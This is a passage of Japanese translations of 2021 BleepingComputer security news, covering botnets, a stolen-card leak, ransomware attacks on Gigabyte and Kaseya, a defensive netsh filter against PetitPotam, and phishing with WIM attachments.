     「08月18日現在、我々は、オンライン上でCVE-2021-35395を脆弱性攻撃する目論見を同定している」と先週レポートを公開したSAMは述べている。
     このボットネットによってターゲットにされているバグだらけのRealtek SDKを使用している大多数の汎用デバイスは、Netis E1 +エクステンダー、EdimaxN150とN300Wi-Fiルーター、および、主にWi-Fi受信を強化するために使用されるRepotecRP-WR5444ルーターであると、SAMは述べている。

    ボットネットはアップデートされており新しいデバイスをターゲットにしている

     このMiraiベースのボットネットの背後にいる脅威のアクターは、2週間前以前に、緊急の認証バイパス脆弱性(CVE-2021-20090)を攻撃するために彼らのスキャナをアップデートし、Arcadyanファームウェアを使用している数百万のホームルータに影響を与えられるようにしている。
     現時点でJuniper Threat Labsの研究者が明らかにしているように、この脅威のアクターは、少なくとも2月以来ネットワークとIoTデバイスをターゲットにしている。
     「このイベントのチェーンは、ハッカーがコマンド挿入脆弱性を積極的に探し、広汎に使用されているマルウェアを素早く拡散しようとしていることを示している」とSAM Seamless NetworkのOmri Mallis(chief product architect)は発言している。
     「これらの種類の脆弱性は、悪用することが容易であり、デバイスにパッチが適用され、セキュリティベンダが対応できるかなり前に、攻撃者が採用している既存のハッキングフレームワーク中に簡単に統合することができる。」
     影響を受けるデバイスの完全なリストは、ここに記載するにはあまりにも膨大なので、IoT Inspectorレポートの末尾を参照されたい。


    カード市場を宣伝するために盗まれた100万のクレジットカードがリークされた
    BleepingComputer : News>Security(2021/08/09)
     脅威のアクターは、2018年から2019年に盗んだ100万のクレジットカードをハッキングフォーラムにリリースすることによって、新しい犯罪Carding(不正取引)市場を宣伝している。
     Cardingとは、盗んだクレジットカードを不正取引し使用することである。これらのクレジットカードは、point-of-sale malware, magecart attacks on websites, 情報窃取トロイの木馬を介して盗んだものである。
     これらの盗まれたクレジットカードは、次に犯罪不正取引市場で販売される。この市場は、脅威のアクターがオンライン購入を、より一般的には、追跡困難なプリペイド ギフトカードを購入するためにそれらを購入する場所である。
     All World Cardsと名付けられた新しいカード犯罪不正取引市場は、多数のハッキングフォーラムに投稿され、そこで、彼らは100万のクレジットカードを無料でリークした。
     フォーラムの投稿によると、これらのクレジットカードは、2018年から2019年に盗まれたものである。

    All World Cardsを宣伝するハッキングフォーラムへの投稿(画像をクリックすると拡大表示されます)

     ランダムに選んだ98のカード(盗んだカードのおよそ27%)は、依然として使用可能であると、この脅威のアクターは述べている。
     しかしながら、イタリアのセキュリティ企業D3Labsは、50%が依然として使用可能であり、当初示されていた値より遥かに大きいとレポートしている。
     「現時点で、我々解析チームへのフィードバックは依然として限定的であるが、カードのおよそ50%が未だ使用可能であり、未だセキュリティ侵害されたと特定されていない」と、D3Labは、このリークに関してブログに投稿している。
     サイバーセキュリティ企業Cybleはクレジットカードのダンプを解析し、このリークは、クレジットカード番号、有効期限、セキュリティコード、名前、国名、州、市、住所、各クレジットカードの郵便番号、eMailと電話番号を含んでいるとBleepingComputerに告げている。
     Cybleは今までに、40万のカードを解析しただけであるが、関連する銀行のトップ5は以下である。
      ・ STATE BANK OF INDIA (44,654 cards、インドステイト銀行、インド)
      ・ JPMORGAN CHASE BANK N.A. (27,440 cards、JPモルガン・チェース銀行、米国)
      ・ BBVA BANCOMER S.A. (21,624 cards、BBVAバンコメル、メキシコ )
      ・ THE TORONTO-DOMINION BANK (14,647 cards、トロント・ドミニオン銀行、カナダ)
      ・ POSTE ITALIANE S.P.A. (BANCO POSTA) (14,066 cards、ポステ・イタリアーネ、イタリア)
     あなたのカードが、この漏洩の一部であるか否かをチェックするするために、Cybleは彼らのAmIBreachedサービスにそのデータをインポートしている。
     あなたの情報が、この漏洩中に見つかった場合には、クレジットカード会社に連絡を取り新しいクレジットカードと番号を再発行してもらうように強くアドバイスする。
     また、クレジットカードの明細書を徹底的に確認して過去の不正請求と今後の請求を確認する必要がある。

    All World Cards市場

     All World Cardsのサイトは、カード不正取引市場では比較的に新参者である。そして、この宣伝は、このダンプをダウンロードした脅威のアクターの賞賛を受けている。
     この不正取引サイトは2021年05月に始まり、クレジットカードの在庫数は2,634,615である。カード最大の国は米国であり、1,167,616カードが販売されている。

    All World Cards市場(画像をクリックすると拡大表示されます)

     カードの販売価格は、$0.30から$14.40(33.20円から1594円)であり、その70%は$3.00から$5.00(332.02円から553.37円)である。
     All World Cardsは、サイバー犯罪企業やThreat Intelligence(【訳注】スレットインテリジェンスとは、「脅威情報」とも呼ばれるもので、サイバーセキュリティ関連の多くの情報を収集、蓄積し、それらを分析することで、脅威に対抗するための方法に生かしていくもの(Cyber Security.comより))企業が注目する新しい市場である。
     彼らは大物になることを目指しており、この100万の無料ダンプにより、他の多くの脅威アクターを彼らの市場に引き付ける可能性がある。


    コンピュータハードウェア大手GIGABYTEがRansomEXX身代金要求型マルウェアに攻撃された
    BleepingComputer : News>Security(2021/08/06)
     台湾のマザーボードメーカGigabyteが、RansomEXX身代金要求型マルウェアのギャングによって攻撃された。このギャング共は身代金が支払われない場合には、盗んだ112GBのデータを公開すると脅している。
     Gigabyteはマザーボードで著名であるが、グラフィックスカード、データセンターサーバ、ラップトップ、モニターのような他のコンピュータ コンポーネントやハードウェアも生産している。
     この攻撃は先週の火曜日の夜から水曜日にかけて発生し、この企業に台湾にあるシステムをシャットダウンさせた。この事件はまた、この企業のサポートサイトや台湾のWebサイトの一部を含む複数のWebサイトに影響与えた。

    身代金要求型マルウェア攻撃によるGigabyteサポートのダウン(画像をクリックすると拡大表示されます)

     顧客はまた、サポートドキュメントへのアクセスやRMA(【訳注】Return Merchandise Authorization、返品保証)に関するアップデート情報の入手に関する問題も報告している。
     中国語のニュースサイトUnited Daily News(【訳注】聯合報、台湾の新聞)によると、Gigabyteは、サイバー攻撃で影響を受け幾つかのサーバが影響を受けたことを認めている。
     彼らのネットワークの異常な挙動を検出した後、GigabyteはITシステムをシャットダウンし、法執行機関に通知した。

     当該サイバー攻撃または、他の報告されていないサイバー攻撃に関する直接情報がある場合は、Signal +16469613731、または、Wire @lawrenceabrams-bc で内密に連絡することができる。

    GigabyteはRansomEXX身代金要求型マルウェア攻撃で損害を被っている

     Gigabyteは、どの身代金要求型マルウェア作戦が攻撃を実行したのかは、公式には発表していないが、BleepingComputerはRansomEXXギャングによるものと認識している。
     RansomEXXオペレータはネットワークを暗号化する時、暗号化された各デバイス上に脅迫文を作成する。
     これら脅迫文には、犠牲者が一つのファイルを復号するテストをするためにアクセス可能な非公開のページへのリンクが含まれている。
     本日、ある情報筋がBleepingComputerにGigabytes Technologies用の非公開のRansomEXXリークページへのリンクを送信してきた。このページには、この脅威のアクターが攻撃を通して112GBのデータを盗んだと主張している。

    非公開のGigabyteデータリークページ(画像をクリックすると拡大表示されます)

     このプライベートのリークページで、この脅威のアクターは、Gigabyteネットワークの内部、並びにAmerican Megatrends Git Repositoryから112GBのデータを盗んだと主張している。

     我々は、112GB(120,971,743,713 bytes)のファイルをダウンロードした。そして、これを公開する準備ができている。
     それらの殆どはNDA(Intel, AMD, American Megatrends)下にある。
     リークソース: newautobom.gigabyte.intra, git.ami.com.tw等

     この脅威のアクターは、攻撃中に盗み出しNDA下にある四つのドキュメントのスクリーンショットを公開している。
     我々はリークされた画像を投稿しないが、この機密のドキュメントはAmerican Megatrendsデバッグ ドキュメント、Intelの「潜在的な問題」ドキュメント、"Ice Lake D SKU stack update schedule"、AMD改訂ガイド、を含んでいる。
     BleepingComputerは、この攻撃に関してGigabyteにコンタクトしたが、現時点で回答はない。

    RansomEXXについて知る必要のあること

     RansomEXX身代金要求型マルウェア作戦は本来、2018年にDefrayという名前で開始されたが、彼らがより積極的になった2020年6月、RansomEXXに名称変更されている。
     他の身代金要求型マルウェア作戦同様に、RansomEXXは、リモートデスクトップ プロトコルを介してネットワークに侵入し、攻撃し、機密データを盗む。
     彼らがネットワークへのアクセスを取得すると、彼らはゆっくりとWindowsドメイン コントローラの制御を奪うので、多くの機密ファイルを収穫するだろう。ネットワークを介しての、この水平拡散の間に、この身代金要求型マルウェア ギャングは身代金恐喝の効果を持たせるために暗号化されていないデバイスからデータを盗み出す。
     RansomEXXはWindowsデバイスだけをターゲットにしているわけではなく、VMware ESXiサーバを稼働しているバーチャルマシンを暗号化するためにLinux暗号器も作成している。
     過去一ヶ月に渡り、RansomEXXギャングは、イタリアのラツィオ州エクアドルの国家電気通信会社(Corporacion Nacional de Telecomunicaciones:CNT)への最近の攻撃に見られるように、より積極的になっている。
     身代金要求型マルウェアのギャングによる他の注目を集める攻撃には、ブラジル政府のネットワークTexas Department of Transportation(TxDOT、テキサス運輸省)、コニカミノルタIPGフォトニクスTyler Technologies(タイラー テクノロジーズ)が含まれる。


    WindowsへのPetitPotam攻撃は新しい方法でブロックすることができる
    BleepingComputer : News>Security(2021/08/02)
     セキュリティ研究者たちは、最近公開されたPetitPotam攻撃ベクトル(ハッカーがWindowsドメインコントローラの制御を簡単に取得することを可能にする)をブロックする方法を考案した。
     先月、セキュリティ研究者GILLES Lionelは、PetitPottamと名付けられた新しい方法を公開した。PetitPottamは、Microsoft Encrypting File System Remote Protocol (EFSRPC)を使用して、脅威のアクターの悪意あるNTMLリレーサーバに対してWindowsドメインコントローラを含むWindowsマシンに認証を強制するものである。
     脅威のアクターは次に、この認証要求をHTTPを介して標的にしているドメインのActive Directory Certificate Servicesにリレーする。ここで、攻撃者はKerberos ticket-granting ticket (TGT)を与えられる。これで、彼らはそのドメインコントローラのIDを引き継ぐことが可能になる。
     このベクトルが公開された後、研究者は直ちに、この方法のテストを開始し、認証をダンプしWindowsドメインを乗っ取ることがいかに簡単であるかを説明した。

    PetitPotam NTLM relay attack demonstration from BleepingComputer.com on Vimeo.

    上の動画が表示されない場合はこちら

     この攻撃を使用して、脅威のアクターは、Windowsドメインを完全に制御することができる(新しいグループポリシー、スクリプトを押し付けたり、身代金要求型マルウェアのようなマルウェアを全てのデバイスに配備することを含む)。
     先週、MicrosoftはNTMLリレー攻撃を緩和する方法を説明した 'Mitigating NTLM Relay Attacks on Active Directory Certificate Services (AD CS)'と題されたアドバイザリをリリースした。
     「NTLMが有効にされたネットワーク上でNTLM Relay Attacksを防ぐには、ドメイン管理者は、NTLM認証を許可するサービスがExtended Protection for Authentication (EPA)のような防御を使用するか、SMB署名のような署名機能を使用する必要がある」と「PetitPotamは、Active Directory Certificate Services (AD CS)がNTLMリレー攻撃用の防御に設定されていないサーバを悪用している。KB5005413で概要されている緩和策は、顧客にこのような攻撃から彼らのAD CSサーバを防御する方法に関して説明している」と、Microsoftのアドバイザリは説明している。
    Microsoftの提案は、NTLMリレー攻撃を妨げるかもしれないが、彼らはPetitPotamのブロックに関しては何のガイダンスも提供していない。
     「NTLMv1のダウングレードや、このマシンアカウントがローカル管理者であるコンピューターのマシンアカウントにリレーするような様々な攻撃に使用できる」と、この攻撃ベクトルを彼が最初に公開した時、LionelはBleepingComputerに告げている。
     PetitPotam, SeriousSAM, PrintNightmareのような最近の脆弱性に対するMicrosoftの対応は、Microsoftの顧客保護は不十分であると感じているセキュリティ研究者を大変心配させている。

    Florian RothのTweetはこちら

    NETSHフィルタを使用してPetitPotam攻撃をブロックするには

     グッドニュースは、研究者が、ローカルEFS機能に影響を与えることなくNETSHフィルターを使用することでリモート非認証PetitPotam攻撃をブロックする方法を発見したことである。
     NETSHは、管理者がネットワーク インターフェースを設定する、フィルターを追加する、Windowsファイアーウォール設定を変更することができるWindowsのコマンドライン ユーティリティである。
     この週末、Craig Kirbyは、MS-EFSRPC APIに対するリモートアクセスをブロックするNETSH RPCを公開した。これは、非認証のPetitPotam攻撃を効果的にブロックする。
     セキュリティ研究者Benjamin Delpyによると、あなたは、以下の内容を'block_efsr.txt'と名付けたファイルにコピーし、それをデスクトップに保存することで、このフィルターを使用することができる。

    rpc
    filter
    add rule layer=um actiontype=block
    add condition field=if_uuid matchtype=equal data=c681d488-d850-11d0-8c52-00c04fd90f7e add filter
    add rule layer=um actiontype=block
    add condition field=if_uuid matchtype=equal data=df1941c5-fe89-4e79-bf10-463657acf44d
    add filter
    quit

     特権が昇格されたコマンドプロンプトが開くのでNETSHを使用して、このフィルターをインポートするために以下のコマンドをタイプする。

    netsh -f %userprofile%\desktop\block_efsr.txt

     以下のコマンドを実行することで、このフィルタが追加されたか否かを検証することができる。

    netsh rpc filter show filter

     このコマンドを実行すると、netshは、二つのフィルタ(c681d488-d850-11d0-8c52-00c04fd90f7e と df1941c5-fe89-4e79-bf10-463657acf44d)を以下の画像のように表示するはずである。

    設定されたPetitPotamをブロックするNETSH RPCフィルタ(画像をクリックすると拡大表示されます)

     このフィルタが適切であれば、PetitPotamはもはや動作しないが、EFSは、そのデバイス上で通常通り操作を継続する。
     何時かMicrosoftが、この攻撃を防御するためにこのAPIを修正したなら、以下のコマンドを使用してこのフィルタを削除することができる。

    netsh rpc filter delete filter filterkey=[key]

     フィルタキー(filterKey)は、上述したように、設定されたフィルタのリストが表示された時に見つけることができる。


    Registry Explorerは全てのWindowsユーザ必須のレジストリエディタである
    BleepingComputer : News>Security(2021/08/01)
     先週、新しいオープンソースのRegistry Editorがリリースされた。これは、WindowsのRegeditソフトウェアを凌ぐものであり、高度な機能を提供しており、今までより簡単にレジストリを編集することができる。
     Windowsのレジストリは、中央集権化されており、システム設定、ハードウェア設定、ユーザ設定を格納するためにオペレーティングシステムによって使用される階層化されたデータベースである。
     あなたがシステム管理者あるいは、パワーユーザであるのなら、ある時にWindows組み込みのレジストリエディタ(Regedit.exe)を使用してバグや設定を修正するためにレジストリを変更したことがあるだろう。
     しかしながら、Microsoftは、数年間彼らのレジストリエディタに対して、このアプリケーションを最新にするための多くの変更を実行していない、そして、人々が望む多くの有用な機能は無いままである。

    Registry Explorerを論じる

     先週、Windows InternalsのエキスパートPavel YosifovichはRegistry Explorerと名付けたプログラムをリリースした。このプログラムは、新しい豊富な機能を搭載しレジストリエディタの最新化を目的としている。
     Registry ExplorerはオープンソースプロジェクトとしてGitHub上にリリースされた。依然として、コンパイルすることを望まない人々のために、Yosifovichは、ダウンロードして即座に稼働できるプレコンパイルされたベータバージョンもリリースしている。
     Registry Explorerを起動した後、全てのレジストリハイブが表示されるので、ユーザーはこれを展開して、標準のWindowsレジストリエディタ同様にサブキーと値を表示できる。

    Windows Explorer(画像をクリックすると拡大表示されます)

     しかしながら、このプログラムが優れているところは、含まれているダークモード、キーと値を様々な場所にコピー&ペーストする能力、Undoチェンジボタン、高度な検索機能にある。
     Registry Explorerの検索機能は、Regeditの検索機能より遥かに高度であり、以下に示すように検索した結果を単一のダイアログボックスで全ての検索結果を表示する。次に、検索結果を確認し、エントリをダブルクリックすることで、そのレジストリのキーまたは値を自動的に開くことができる。

    一つのウィンドウにレジストリ検索結果の全てを示しているRegistry Explorer(画像をクリックすると拡大表示されます)

     レジストリで誤った変更をすると、Windowsは正しく操作できなくなる。Registry Explorerは、Read Only Mode(読み込み専用モード)で起動する。このモードをOFFにするまで変更の実行は妨げられる。
     Registry Explorerの全機能のリストを以下に示す。
      ・ 実際のレジストリを表示する(標準のレジストリだけでなく)
      ・ リストビューを任意の列で並べ替える
      ・ ハイブ、アクセスできないキー、およびリンクのキーアイコン
      ・ キーの詳細:最終書き込み時間とキー/値の数
      ・ MUIおよびREG_EXPAND_SZの拡張された値を表示
      ・ 全検索(全てを検索する / Ctrl+Shift+F)
      ・ バイナリ用の拡張された16進エディタ
      ・ Undo/Redo
      ・ キーや値のコピー&ペースト
     更に良いのは、あなたがRegistry Explorerを本当に好むのであれば、WindowsのRegistry Editor(Regedit.exe)を、このプログラムに自動的に置き換え、.regファイル用のDefaultのファイルハンドラにするるための設定をすることができる。
     あなたが、しばしばWindows Registryを編集したり、値を検索したり、.regファイルの設定をエクスポートしているのであれば、Registry Explorerを試すことを強く推奨する。あなたは多くの機能が非常に有用であることを多分発見するだろう。
     Registry Explorerを試すには、このプロジェクトのGitHubのページを訪ねなさい。


    Kaseyaは、REvil身代金要求型マルウェア犠牲者向けのユニバーサル復号プログラムを入手した
    BleepingComputer : News>Security(2021/07/22)
     Kaseyaは、7月2日のREvil身代金要求型マルウェア攻撃の犠牲者がファイルを無料で復号できるユニバーサル復号プログラムを受け取った。
     7月2日、Revil身代金要求型マルウェア作戦は、およそ60の管理サービスプロバイダと1500と見積もられる企業を暗号化するKaseya VSAリモートマネージメント アプリケーション中の0-Dayの脆弱性を攻撃する巨大な攻撃を起動した
     この攻撃の後、この脅威のアクターは、ユニバーサル復号プログラムに関して7000万$、MSP(マネージド・サービスプロバイダ)に関して500万$、犠牲者のネットワーク上の暗号化された拡張毎に4万$を要求した。

    Revilの7000万$身代金要求(画像をクリックすると拡大表示されます)

     その後直ぐ、REvil身代金要求型マルウェアのギャングは不思議なことに姿を消し、脅威のアクターは彼らの支払いサイトとインフラをシャットダウンした。
     殆どの犠牲者は支払いをしていないが、このギャングが姿を消したことは、復号プログラムを購入する必要があったかもしれない企業が、そうすることを不可能にした。
     本日、Kaseyaは「信頼できるサードパーティー」からこの身代金要求型マルウェア攻撃のユニバーサル復号プログラムを受け取っり、現在影響を受けた顧客に、この復号プログラムを配布していると述べている。
     「我々は信頼できるサードパーティーから復号プログラムを入手したが、そのソースについては一切公開することはできない」と「別のサードパーティーによってこのツールの確認が行われ、影響を受けている我々の顧客にこの復号プログラムの配布を開始した」と、Kaseyaの企業マーケティング上席副社長Dana LiedholmはBleepingComputerに告げた。
     Kaseyaは、このキーのソースに関する情報を公開しないだろうが、BleepingComputerと共に確認したところによると、これは、この攻撃全体のユニバーサル復号キーであったので、全てのMSPと彼らの顧客がファイルを無料で復号することが可能になる。
     彼らが復号プログラムを入手するために身代金を支払ったのか否か尋ねたところ、Kaseyaは「肯定も否定もできない」とBleepingComputerに告げた。
     EmsisoftのCTOであるFabian WosarがBleepingComputerに告げたことによると、Emisisoftが、このキーを検証したサードパーティーであり、Kaseyaの復旧作業の支援を継続している。
     「我々はKaseyaの顧客の契約上の取り組みをサポートするためにKaseyaと協働している。我々はこのキーが犠牲者のロックを外すことに効果的であることを確認した、我々はKaseyaとその顧客に対するサポートを引き続き提供する」と、WosarはBleepingComputerに告げている。
     REvil身代金要求型マルウェア作戦に何が起きてシャットダウンし姿を消したかは不明である。そして、複数の国際的法執行機関がBleepingComputerに告げたところによると、彼らは、この脅威のアクターが姿を消したことに関与していないということであった。
     JBS(【訳注】ブラジルに本拠を置く世界最大級の食肉会社)とKaseyaが攻撃された後、ホワイトハウスは、この身代金要求型マルウェアのギャングがロシア国内に存在すると確信し、何かを実行するようにロシア政府に圧力をかけた
     ロシア政府は米国と共同歩調をとっていることを示すために、REvil身代金要求型マルウェアのギャングにシャットダウンし姿を消すように告げたと信じられている。
     この復号プログラムがREvil身代金要求型マルウェアのギャングが姿を消した後に入手されたので、ロシアが直接この身代金要求型マルウェアのギャングから受け取り、誠意の仕草として米国の法執行機関と共有した可能性がある。
     我々が、復号キーの長短に関係しているか否かをFBIに尋ねた時に告げられたことは、捜査中のことはコメントできないであった。
     「米国司法省(DOJ)とFBIは、REvil/Sodinokibi身代金要求型マルウェアの亜種の背後にいる犯罪企業と、取り分けKaseya身代金要求型マルウェア攻撃に関する責任あるアクターの犯罪調査を実行中である」と「DOJの方針に従い、この捜査中の案件についてこれ以上コメントすることはできない」と、FBIはBleepingComputerに告げている。
     REvilが姿を消したのは、このギャングのオンライン活動が終わったのではない可能性がある。
     過去に、GandCrabランサムウェア作戦がシャットダウンされ、REvilとしてブランド名が変更されている。また、REvilが新しいランサムウェア作戦として再び登場することは予想されることである。


    脆弱性攻撃されているPrintNightmareの0-Dayに非公式のパッチがリリースされた
    BleepingComputer : News>Security(2021/07/02)
     積極的な脆弱性攻撃の下にあるWindows Print Spoolerサービス中のPrintNightmare 0-Day脆弱性を解決するフリーのマイクロパッチが、0patchプラットフォーム上で利用可能になっている。
     このリモートコード実行のバグ(CVE-2021-34527として追跡される)の背後にあるバグだらけのコードは、Windowsの全てのバージョンに存在しているが、Microsoftは、この脆弱性が、彼らの全てのプラットフォームで脆弱性攻撃可能か否かなのかを依然として調査中である。
     CVE-2021-34527は、攻撃者がSYSTEM権限でRCEを介して影響を受けるサーバを乗っ取り、プログラムのインストール、データの表示、変更、削除、完全なユーザー権限を持つ新しいアカウントの作成を行うことが可能である。
     現時点でPrintNightmareセキュリティフローを解決できるセキュリティアップデートは存在していないが、Microsoftは脆弱性のあるシステムがセキュリティ侵害されることから攻撃者をブロックするための緩和策を公開し、修正作業に取り組んでいる。
     そこで、0patchマイクロパッチ サービスがフリーのマイクロパッチ提供している。このマイクロパッチは、Windows Serverのバージョン2019, 2016, 2012(2021年6月にアップデートされた),2008 R2(2020年1月のアップデートでインストールされたが、拡張セキュリティアップデートではない)用である。

     0patchのTweeterはこちら

     0patchによると、「上述のパッチの一部は、記述している時点では発行されていないかもしれないが、数時間後には発行されているだろう」としている。
     関連するニュースで、CISAは印刷に使用していないサーバ上のWindows Print Spoolerサービスを無効にするように管理者に促すPrintNightmare通知を発行した。
     Microsoftもまた、Print Spoolerサービスを有効にしているDomain Contorollerのリスクの緩和に関するサポートドキュメントにおいて、この印刷サービスを全てのDomain ControllersとActive Directory管理システムで無効にするように推奨している。
     この企業のアドバイスは、殆どのWindowsクライアントとサーバープラットフォームでデフォルトで有効になっているという事実(このサービスが、脆弱なシステムを標的とする将来の攻撃のリスクを大幅に高める)を考慮に入れている。
     公式のセキュリティアップデートが利用可能になるまで、0patchのマイクロパッチ、もしくはMicrosoftが提供する緩和策を適用し、PrintNightmare脆弱性攻撃を使用してネットワークに侵入されることから攻撃者をブロックすべきである。


    ハッカーは0-Dayの脆弱性を使用してMy Book Liveデバイスのデータを消失させている
    BleepingComputer : News>Security(2021/06/29)
     Western DigitalのMy Book Live NASデバイス中の0-Dayの脆弱性は、先週、攻撃者がデバイスの大規模な工場出荷状態へのリセットを実行することを可能にしていたため、データの損失に繋がった。
     先週、我々はWestern DigitalのMy Book Live NASの所有者が、奇妙なことに保存していたファイルの消滅が突然発生したという話を公開した。残念なことに、この工場出荷状態へのリセットは管理者パスワードもリセットするので、ユーザはWebダッシュボードやSSHを介してデバイスにログインすることができなくなる。
     一部のユーザがデバイスのログを解析した後、彼らは、6月24日にデバイスのファイルを消去するfactoryRestore.shと呼ばれるスクリプトが彼らのデバイス上で実行されていたことを発見した。

     Jun 24 00:26:53 MyBookLive factoryRestore.sh: begin script:
     Jun 24 00:26:53 MyBookLive shutdown[5033]: shutting down for system reboot
     Jun 24 00:26:53 MyBookLive logger: exit standby after 9674 (since 2021-06-23 21:45:39.926803414 +0100)

     Western Digitalは、BleepingComputerに、この攻撃はCVE-2018-18472として追跡される2018年の脆弱性を介して実行されていると当初告げていたが、2015年以降サポートされていなかったため、この脆弱性は修正されていなかった。
     攻撃者がMy Book Liveデバイスに対する攻撃に、この脆弱性を使用したことは判明したが、実際には、工場出荷状態にリセットする原因となる別の0-Dayの脆弱性が存在していた。

    工場出荷状態にリセットするために使用された0-Day

     Censysの最高技術責任者(CTO) Derek Abdineは、My Book Liveデバイスの最新のファームウェアが、リモート攻撃者がインターネットに接続されているデバイスを工場出荷状態にリセットすることを可能にする0-Dayの脆弱性を含んでいることを明らかにした。
     工場出荷状態へのリセットは、一般的にリモート管理コンソールを介して可能であるが、それらは最初に管理者自体をデバイスに認証させることを常に要求する。
     My Book Liveのファームウェア中の適切に名付けられたsystem_factory_restoreスクリプトでは、この認証チェックはコメントアウトされていたので、誰もがそのデバイスにアクセスし工場出荷状態にリセットすることが可能になっていた。
     この0-Dayを自主的に通知したArs TechnicaのDan Goodinが公開したスクリプトにおいて、get()とpost()関数で、何らかの理由からWestern Digitalの開発者によって認証チェックがコメントアウトされていることを確認することができる。

    工場出荷状態へのリセットを発生させるコメントアウトされた認証チェック(画像をクリックすると拡大表示されます)

     攻撃者がエンドポイントに対する正しいパラメータを見つけ出すことができれば、彼らは世界中のデバイスを工場出荷状態にリセットする大規模な引き金を弾くことができる。

    NASの制御のための戦い

     ハッカーはデバイスを工場集荷状態にリセットするために、この0-Dayの脆弱性を使用したが、その前のかなり長い間、悪意ある活動があったと思われる。
     Abdineによって行われた研究から、攻撃者は、2018年のCVE-2018-18472リモードコード実行脆弱性を大規模に悪用し、大っぴらに露出しているMy Book Liveデバイスに感染し、それらにボットネットを追加していた。
     以下に示すように、この脆弱性を使用して攻撃者はNASデバイス上でコマンドを実行し、リモートサイトからスクリプトをダウンロードし実行していた。

    CVE-2018-18472を使用した大規模脆弱性攻撃のデモ(画像をクリックすると拡大表示されます)

     影響を受けたユーザによってVirus Totalにアップロードされ確認されたペイロードの一つは、DrWebによってLinux.Ngioweb.27(IoTデバイスをターゲットにする既知のLinuxボットネット)の変種として検出された。他のペイロードもこの攻撃で確認されているが、どのマルウェアファミリーに属するのか明らかになっていない。
     一旦、ボットネットにリスト化されると、攻撃者は遠隔からMy Book Live NASデバイスを使用して、DDoS攻撃、他のデバイスへの攻撃、コマンドの実行、ファイルを盗むことさえ実行できる可能性がある。
     この攻撃はまた、様々なスクリプトをパスワードで保護し、ライバルのボットネットや他の攻撃者によって、このデバイスが乗っ取られることを防いでいる。
     我々は今、My Book Liveデバイスを標的にした様々な攻撃に対する何らかの洞察は持っているが、攻撃者がNASデバイスのデータを大規模に消去する動機に関しては分かっていない。
     Abdineは、この0-Dayを使用した大規模なデータ削除は、他の攻撃者、あるいはライバルのボットネットがデバイスをリセットすることで、このデバイスを乗っ取ろうとした可能性があると考えている。
     「大規模にこのエンドポイントにPOSTする動機に関しては不明であるが、これらのデバイスを乗っ取ったり、使用できないようにしようとしている(おそらく、ユーザー名とパスワードをDefaultのadmin/adminにリセットすることで、別の攻撃者が制御を奪うことが可能になるので)ライバルのボットネット オペレーターや、これらの問題が2015年以降存在しているため、しばらくの間存在していたであろうボットネットを他の方法で粉砕したい者が企てている可能性がある」と、Abdine氏は説明している。
     消費者向けIoTデバイスは、攻撃者が気付かれずに攻撃を実行できるためサイバー犯罪の世界で価値のある商品である。
     IoTデバイスには、セキュリティ侵害されたことを示す外部信号が殆ど無いので、攻撃者は検出されることなく悪意あるキャンペーンの一部としてそれらを長期間使用することができる。
     現時点では、ユーザーはMy Book Liveデバイスを大ぴらなアクセスから防御すべきであり(【訳注】インターネット接続を切断するということ)、ローカルネットワークやVPNの下でのみ使用すべきである。
     BleepingComputerはWesternDigitalに連絡を取り、この脆弱性のパッチをリリースするかどうかを確認したが、このデバイスは6年間サポートされていないため、パッチのリリースはないと思われる。


    フィッシング攻撃の一般的ではない添付ファイルは諸刃の剣である
    BleepingComputer : News>Security(2021/06/24)
     脅威のアクターはセキュリティソフトウェアをバイパスするために一般的ではない添付ファイルを使用しているが、これは、彼らに対しても作用する可能性のある諸刃の剣である。
     安全なeMailゲートウェイとセキュリティソフトウェアが、より高度になり絶えず変化するフィッシングキャンペーンに対応するようになるにつれ、脅威のアクターは検出をバイパスするために、より一般的ではないファイルフォーマットに頼っている。
     従来より、フィッシングスカムは、ISOやTARファイルのようなeMailの添付ファイルとしては一般的ではない添付ファイルに切り替えてきていた。
     しかしながら、脅威のアクターが新しく一般的ではない添付ファイルを採用したので、サイバーセキュリティ企業は、それらをブロックするために更なる機能を追加している。

    セキュリティをバイパスするために使用されているWIM

     Trustwaveの新しいレポートによると、研究者は、脅威のアクターがAgent Teslaリモートアクセス トロイを拡散させるためにWIM(Windows Imaging Format)を添付ファイルとして悪用し始めていると説明している。
     「我々がサンプルから収集した全てのWIMファイルはAgent Teslaを含んでいた。この脅威は.NETで書かれたRemote Access Trojan(RAT)であり、セキュリティ侵害したシステムを完全に制御し、HTTP, SMTP, FTP, Telegramを介してデータを密かに抽出することができるものである」と、Trustwaveのセキュリティ研究者Diana Loperaはこのレポートの中で説明している。
     これらのキャンペーンは、以下に示すようにDHL(【訳注】航空機を主体とした国際宅配便、運輸、ロジスティクスサービスを扱うドイツの国際輸送物流会社)やAlpha Trans(【訳注】米国を本拠とする輸送会社)からのシッピング情報を装うフィッシングeMailで開始される。

    WIMファイルを拡散するフィッシングeMail(画像をクリックすると拡大表示されます)

     このeMailに含まれているのは .wim添付ファイル(末尾は時々、.wimや.wim.001になっている)でありセキュリティソフトをバイパスするように設計されている。
     Windows Imaging Format(WIM)ファイルは、Windows Vistaとその後のオペレーティングシステムに採用することを目的にMicrosoftが開発したファイルベースのディスクイメージフォーマット(【訳注】殆どのディスクメージ形式はセクターベースイメージフォーマット)である。
     WIMファイルは、配布を簡単にするために、その全てのファイルやフォルダを単一ファイルにパックするために使用される。
     以下の画像に見られるように、Hex Editor(16進エディタ)でこれらWIM添付ファイルの一つを開くと、その中に実行ファイルが包含されていることが明らかに示されている。

    Hex Editorで表示したWIM添付ファイル(画像をクリックすると拡大表示されます)

     しかしながら、WIMファイルが検出される可能性は低いかもしれないが、WIMファイルを使用したフィッシングキャンペーンは、WindowsがWIMファイルを開くための組み込みメカニズムを持っていないので、より大きな問題を抱えることになる。
     それ故、ユーザがWindowsでこの添付ファイルを開こうとした時、ユーザは、以下に示すようなWIMファイルを開くためのプログラムを選択するように要求するメッセージが表示される。

    Windowsでのプログラム選択の要請(画像をクリックすると拡大表示されます)

     このファイルフォーマットは次ぎに、横道にそれて7-zipのようなプログラムを使用してこのファイルを解凍し、次に、その中にあるファイルをダブルクリックすることを受信者に要求するだろう。これはまず発生しない。

    7-zipを使用して解凍したWIMファイル(画像をクリックすると拡大表示されます)

    一般的ではない添付ファイルは諸刃の剣

     一般的ではないファイルを使用することは、一部のセキュリティフィルタをバイパスするかもしれないが、これはまた脅威のアクターにとっても、おそらく諸刃の剣である。
     これは、このファイルが、7-zipのような特定のプログラムを持っていない殆どのデバイスで開かれることがなく、このファイルを解凍するために特別な努力を受信者に強いることが理由である。
